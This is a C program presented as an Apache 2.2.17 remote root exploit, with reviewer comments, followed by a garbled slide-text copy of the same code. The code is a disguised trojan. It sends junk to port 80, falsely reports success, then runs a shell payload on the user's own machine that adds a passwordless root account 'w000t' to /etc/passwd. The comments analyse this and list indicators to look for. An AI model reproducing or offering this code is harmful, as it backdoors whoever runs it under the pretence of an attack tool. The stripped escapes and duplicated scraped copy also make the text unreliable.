/* apachesm4sh.c apache 2.2.17 remote root exploit*/
/* KEEP PRIV8&!&! leak and i will find you :) ~ desg */

#include   <stdio.h>
#include   <stdlib.h>
#include   <string.h>
#include   <strings.h>
#include   <netdb.h>
#include   <unistd.h>
#include   <sys/types.h>
#include   <sys/socket.h>
#include   <netinet/in.h>
#include   <arpa/inet.h>

/*
 * Payload blob that main() copies into the send buffer and also passes to a
 * local shell.
 *
 * NOTE(review): as printed here the backslashes of the \x escapes are missing
 * (presumably lost when the slide text was extracted), so this listing, compiled
 * as-is, yields the plain text "xebx2a..." rather than the bytes it spells out.
 *
 * Read as hex pairs, the first three lines and the first four bytes of the
 * fourth are x86 machine code (they contain `cd 80`, the Linux int 0x80
 * system-call instruction). Everything after that is printable ASCII:
 *
 *   /bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD
 *
 * That text is a shell command line which appends an account named "w000t"
 * with UID 0, GID 0 and an empty password field to /etc/passwd. For triage,
 * the account name "w000t" and the GECOS string "s4fem0de" in /etc/passwd are
 * the artefacts to look for on a host where this payload may have run.
 */
char evil[] =
            "xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89"
            "x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89"
            "x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8"
            "xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23"
            "x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74"
            "x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a"
            "x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68"
            "x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64"
            "x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44"
            "x44x44";

/*
 * Buffer-layout constants. Only BSIZE and ASIZE are referenced by main();
 * NOP, OFFSET and ADDR are defined but never used anywhere in this listing,
 * so no padding bytes and no address value are ever written into the buffer.
 */
#define     NOP   0x90
#define     BSIZE 1000
#define     OFFSET     400
#define     ADDR 0xbffff658
#define ASIZE     2000

/*
 * Entry point. Takes one argument (a host name), opens a TCP connection to
 * port 80 on it, sends a heap buffer containing `evil`, then forks and runs
 * /bin/sh on the LOCAL machine with `evil` as its -c argument.
 *
 * Points a reviewer should note, all visible in the code below:
 *   - The file header names "apache 2.2.17", but nothing here builds an HTTP
 *     request or references any Apache-specific behaviour.
 *   - The buffer comes from malloc() and is never filled apart from the copy
 *     of `evil` and two single bytes, so what is sent is mostly indeterminate
 *     heap content.
 *   - The "successful" message depends only on the return value of send(),
 *     never on anything received from the peer (there is no recv/read).
 *   - The only shell that is started runs on the caller's own host, and the
 *     socket is not connected to it (no dup2 of `s`).
 *
 * NOTE(review): the trailing "n" in the printf strings and the '0' stored at
 * BSIZE + ASIZE + 1 look like "\n" and '\0' whose backslashes were lost in
 * extraction -- confirm against an original copy.
 *
 * Returns: never returns normally; exits with status 1 on setup errors,
 * otherwise ends in an infinite loop.
 */
int
main(int argc, char *argv[])
{
      char *buffer;
      int s;
      struct hostent *hp;
      struct sockaddr_in sin;
      /* Exactly one argument (the target host name) is required. */
      if (argc != 2) {
            printf("%s <target>n", argv[0]);
            exit(1);
        }
      /* malloc() does not zero the allocation; contents start indeterminate. */
      buffer = (char *) malloc(BSIZE + ASIZE + 100);
      if (buffer == NULL) {
            printf("Not enough memoryn");
            exit(1);
        }
      /* Place `evil` so that it ends at offset BSIZE; bytes before and after
       * it are left uninitialised. */
      memcpy(&buffer[BSIZE - strlen(evil)], evil,
            strlen(evil));
      buffer[BSIZE + ASIZE] = ';';
      /* As written this stores the digit '0', not a NUL terminator, so the
       * code does not itself terminate the buffer. */
      buffer[BSIZE + ASIZE + 1] = '0';
      /* Resolve the host name given on the command line. */
      hp = gethostbyname(argv[1]);
      if (hp == NULL) {
            printf("no such servern");
            exit(1);
        }
      bzero(&sin, sizeof(sin));
      /* h_length is taken from the resolver result and is not checked against
       * sizeof(sin.sin_addr) before the copy. */
      bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
      sin.sin_family = AF_INET;
      /* Destination port is fixed at 80. */
      sin.sin_port = htons(80);
      s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      if (s < 0) {
            printf("Can't open socketn");
exit(1);
     }
    /* Any connect() failure is reported as "Connection refused". */
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
          printf("Connection refusedn");
          exit(1);
      }
    printf("sending exploit code...n");
    /* strlen(buffer) scans uninitialised heap memory (undefined behaviour),
     * so the number of bytes sent is unpredictable. send() returns the byte
     * count or -1; "!= 1" is true for a failed send and for any multi-byte
     * send, so the success message says nothing about the remote host. */
    if (send(s, buffer, strlen(buffer), 0) != 1)
          printf("exploit was successful!n");
      else
          printf("sorry, this site isn't vulnerablen");
    printf("waiting for shell.....n");
    /* The child replaces itself with a local /bin/sh whose command string is
     * the payload blob; this runs on the machine executing this program, with
     * the privileges of whoever started it. The socket `s` plays no part. */
    if (fork() == 0)
          execl("/bin/sh", "sh", "-c", evil, 0);
      else
          /* wait() is called without <sys/wait.h> among the includes. */
          wait(NULL);
    /* Busy loop with no I/O: nothing is read from or written to the socket. */
    while (1) { /* shell */ }
}

Yg byev2e

  • 1. /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and i will find you :) ~ desg */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <strings.h> #include <netdb.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> char evil[] = "xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89" "x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89" "x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8" "xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23" "x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74" "x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a" "x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68" "x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64" "x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44" "x44x44"; #define NOP 0x90 #define BSIZE 1000 #define OFFSET 400 #define ADDR 0xbffff658 #define ASIZE 2000 int main(int argc, char *argv[]) { char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2) { printf("%s <target>n", argv[0]); exit(1); } buffer = (char *) malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memoryn"); exit(1); } memcpy(&buffer[BSIZE - strlen(evil)], evil, strlen(evil)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = '0'; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("no such servern"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socketn");
  • 2. exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refusedn"); exit(1); } printf("sending exploit code...n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("exploit was successful!n"); else printf("sorry, this site isn't vulnerablen"); printf("waiting for shell.....n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); while (1) { /* shell */ } }